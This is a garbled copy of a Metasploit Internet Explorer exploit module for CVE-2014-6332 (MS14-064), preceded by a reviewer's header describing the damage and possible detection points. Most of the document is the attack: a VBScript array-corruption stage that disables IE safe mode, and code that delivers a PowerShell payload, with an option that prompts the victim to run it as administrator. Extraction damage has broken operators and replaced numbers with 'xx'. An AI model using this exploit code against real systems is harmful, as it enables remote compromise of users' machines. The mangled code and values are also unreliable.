# NOTE(review): this listing is a damaged copy of a Metasploit browser-exploit
# module for CVE-2014-6332 (MS14-064) and is not valid Ruby as shown.
# Visible extraction damage: the whole file is collapsed onto a few lines,
# identifier case has been altered, HTML-entity residue ("& nbsp;", "&NB Sp")
# is embedded in the code, several "=>" operators appear as "= >", "= =" or
# "+", and numeric literals are missing or replaced by "xx" (for example the
# ChrW arguments and the upper bound of the "between?" version check). The
# final method, get_html, is cut off after the opening of its HTML template.
# Do not treat any value here as authoritative; compare against the upstream
# repository named in the header line below.
#
# What the visible text establishes, for triage and detection work:
#  - Scope: Internet Explorer on Windows, x86 only (browserrequirements); the
#    VBScript exits early when the user agent contains "Win64".
#  - Delivery: a VBScript stage (vbs_prepare) that repeatedly resizes two
#    arrays with "ReDim Preserve" under "On Error Resume Next", followed by a
#    PowerShell command built with cmd_psh_payload. The Tryuac option selects
#    the verb 'runas' instead of 'open'; how the verb is used is not visible
#    because the template is truncated.
#  - Per the module description, PowerShell must be present on the target and,
#    under IE Protected Mode, the user has to allow powershell.exe manually.
#  - Defensive takeaways: MS14-064 is the bulletin referenced for the fix;
#    presumably the observable to alert on is powershell.exe started by the
#    browser process, or an unexpected elevation prompt for it (confirm
#    against the complete upstream module).
# # # This module requires metasploit:http://metasploit.com/download# current source:https://github.com/rapid7/ Metasploit-framework## require ' msf/core ' require ' Msf/core/exploit/powershell ' class Metasploit4 < msf::exploit::remote Rank = excellentranking include Msf::exploit::remote:: browserexploitserver include msf::exploit::remote::browserautopwn include Msf::exploit::P Owershell Autopwn_info ({ : ua_name => httpclients::ie, : Ua_minver = > "3.0", : Ua_maxver => "10.0", : JavaScript = true, : os_name => operatingsystems::match::windows, : rank = excellentranking }) & nbsp; def Initialize (info={}) super (Update_info (info, ' Name ' "Microsoft Internet Explorer Windows OLE Automation Array Remote CodeExecution ", ' Description ' =>%q{ This module exploits Windo WS OLE Automation Array vulnerability known as cve-2014-6332. The vulnerability affects interne T Explorer 3.0 until version one within Windows95 up to Windows 10. Powershell are required on th E Target machine. On Internet Explorer versions using Protected mode, The user have to manually allow POWERSHELL.E Xe-to-execute in order-to-be compromised. 
}, ' License ' = = msf_license, ' Author ' => [   ; ' Robert Freeman ', # IBM x-force ' Yuange ', # TWITTER.COM/YUANGE75&NB Sp ' Rik van Duijn ', # twitter.com/rikvduijn ' Wesley Neelen ', #security[at]forsec.nl ' Gradiusx <francescomifsud[at]gmail.com> ', ' b33f ', # @FuzzySec ], ' References ' => ; [ [' CVE ', ' 2014-6332 '], [' MSB ', ' ms14-064 '], [' Osvdb ', ' 114533 '], [' EDB ' , ' 35229 '], [' EDB ', ' 35308 '], [' URL ', ' Http://secu Rityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows '], [' URL ', ' Https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module '] & nbsp ], ' Platform ' = ' win ', ' Targets ' &NB Sp => [ [' Windows x86 ', {' Arch ' = arch_x86}], ],&NB Sp ' browserrequirements ' => { : source &NBSP;=&G T /script|headers/i, : Ua_name = httpclients::ie, : OS _name =/win/i, : Arch => ' x86 ', : U A_ver => Lambda {|ver| ver.to_i.between? ( 4,} }, ' defaultoptions ' => {   ; ' http::compression ' = ' gzip ' }, ' Payload ' & nbsp => { ' badchars ' =& Gt "\x00" }, ' privileged ' = false, ' disclosuredate ' + "Nov", ' Defaulttarget ' = > 0) register_options ( [ Optbool.new (' Tryuac ', [true, ' Ask victim to start as Administrator ', false]), ], Self.class) &N bsp; end def vbs_prepare () code =%q|dim AA () Dim AB () Dim A0dim A1dim A2dim A3dim Win9xdim Intversiondim Rndadim Funclassdim MYARRAY&NBSP ; Begin () nelinefunction begin () on Error Resume next info=navigator.useragent if (InStr ( info, "Win64") >0) then exit function End if if (InStr (Info, "MSIE") & gt;0) then intversion = CInt (Mid (info, InStr (info, "MSIE") + 5, 2)) & nbsp else exIt function end if win9x=0 begininit () if Create () =true then & nbsp myarray= &NBSP;CHRW (2176) &CHRW (&CHRW) &chrw (xx) &chrw ( XX) &chrw (&CHRW) &NBSP;MYARRAY=MYARRAY&CHRW (xx) &chrw (32767) &chrw (XX) & ChrW (0) if (intversion<4) then document.write ("<br> IE ") document.write (intversion) runshellcode () else Setnotsafemode () end if End IfEnd 
Function&nb Sp;function BeginInit () randomize () redim AA (5) redim AB (5) a0=13+17* Rnd (6) &NBSP;A3=7+3*RND (5) End Function function Create () on Error Resume next Dim i create= false for i = 0 to 400 If over () =true then ' document.write (i) Create=True exit For&nbs P End if NextEnd function sub Testaa () End Sub function MyData () on Error Resume Next&nbs P i=testaa i=null redim preserve AA (A2) ab (0) =0 &NBSP;AA (A1) =i ab (0) =6.36598737437801e-314 &NBSP;AA (a1+2) =myarray ab (2) =1.74088534731324e-310 &NBSP;MYDATA=AA (A1) ReDim preserve AA (A0) End Function function Setnotsafemode () on Error Resume next i=m Ydata () I=readmemo (i+8) I=readmemo (i+16) J=readmemo (i+&h134) For k=0 to &h60 step 4 J=readmemo (i+&h120+k) if (j=14) THEN&N Bsp j=0 ReDim preserve AA (A2) &NBSP;AA (a1+2) (i+&h11c+k ) =ab (4) ReDim preserve AA (A0) j=0 &NB Sp J=readmemo (i+&h120+k) e XIT for end if next AB (2) =1.69759663316747E-313&N Bsp RUNAAAA () end function function over () on Error Resume next Dim type1,type2,type3&nb Sp over=false a0=a0+a3 a1=a0+2 a2=a0+&h8000000 ReDim & nbsp Preserve AA (A0) ReDim AB (A0) ReDim preserve AA (A2) type1= 1 AB (0) =1.123456789012345678901234567890 AA (A0) =10 If (IsObject (AA (A1-1) ) = False) THEN&NBsp if (intversion<4) then mem=cint (a0+1) *16 & nbsp j=vartype (AA (a1-1)) if ((j=mem+4) or (j*8=mem+8)) then & nbsp if (VarType (AA (a1-1)) <>0) Then &NBS P if (IsObject (AA (a1)) = False) then type1= VarType (AA (A1)) end if &NBS P End if else redim pres Erve AA (A0) exit function &NB Sp;end if else if (VarType (AA (a1-1)) <>0) th en If (IsObject (AA (a1)) = False) then &NB Sp Type1=vartype (AA (A1)) End if &NBS P End if End if End if if (type1=&h2f66) Then&nbs P over=true End if If (TYPE1=&HB9AD) then &NBSP ; over=true win9x=1 End if ReDim preserve AA ( A0) end Function function Readmemo (add) on Error Resume next ReDim preserve AA ( A2) AB (0) =0 AA (A1) =add+4 AB (0) =1.69759663316747e-313 Readmemo=lenb (AA (A1)) AB (0) =0 ReDim preserve AA 
(A0) End function | END&Nbsp; def get_html () if datastore[' Tryuac '] tryuac = ' runas ' else TRYUAC = ' open ' end Payl = Cmd_psh_payload (payload.encoded, "x86", {: R Emove_comspec = true}) payl.slice! "Powershell.exe" PREP = Vbs_prepare () HTML =%q|<!doctype html>
Produced by Chinese Cold Dragon: Windows Internet Explorer OLE Automation Array remote code execution vulnerability